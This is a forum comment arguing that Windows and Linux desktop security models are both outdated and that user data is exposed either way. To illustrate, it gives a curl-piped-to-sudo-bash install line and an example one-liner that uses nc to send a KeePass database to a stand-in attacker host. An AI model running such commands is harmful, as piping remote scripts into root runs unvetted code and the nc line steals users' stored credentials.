Windows isn't running anything as admin by default for a decade now. Every action that requires elevated privileges is asking for permission via UAC, same as (gk)sudo but more secure.
> the best practices that exist on Linux: (signed/audited/centralised) packages, mandatory access control, running as a standard user
These are standard practices on every OS that every sane admin implements. Again, just because someone's grandma runs windows 95 under Administrator, doesn't make modern deployments less secure. Also, by far the most popular command on linux is something like `curl -sL https://deb.nodesource.com/setup_12.x | sudo bash`. Do we need to discuss how your security configuration is irrelevant once you run this? This doesn't even require Xorg, and see about 'sudo' part below.
> sticking the UI into the kernel
Last time I checked, Xorg was running as root pretty much everywhere which if not at all different from security perspective.
But then again, privilege escalation is not the main risk for desktop user, because their data is readable by their OS account, doesn't matter if the account has admin privileges or not. If any of your desktop software is exploited via numerous vulnerabilities, or you ran custom script from the internet like the one above - even without sudo, - you are pretty much fucked, because these things can install a keylogger as current user and/or add a cron job or a daemon (again as current user) which will do obfuscated analog of `find ~ -name keepass.kdbx -print0 | xargs -0 cat | nc evil.haxxor.ru 1234` and it will go unnoticed for years.
Security model of all both Linux and Windows is so far behind the real world that it doesn't make any sense to discuss which one of them is more secure.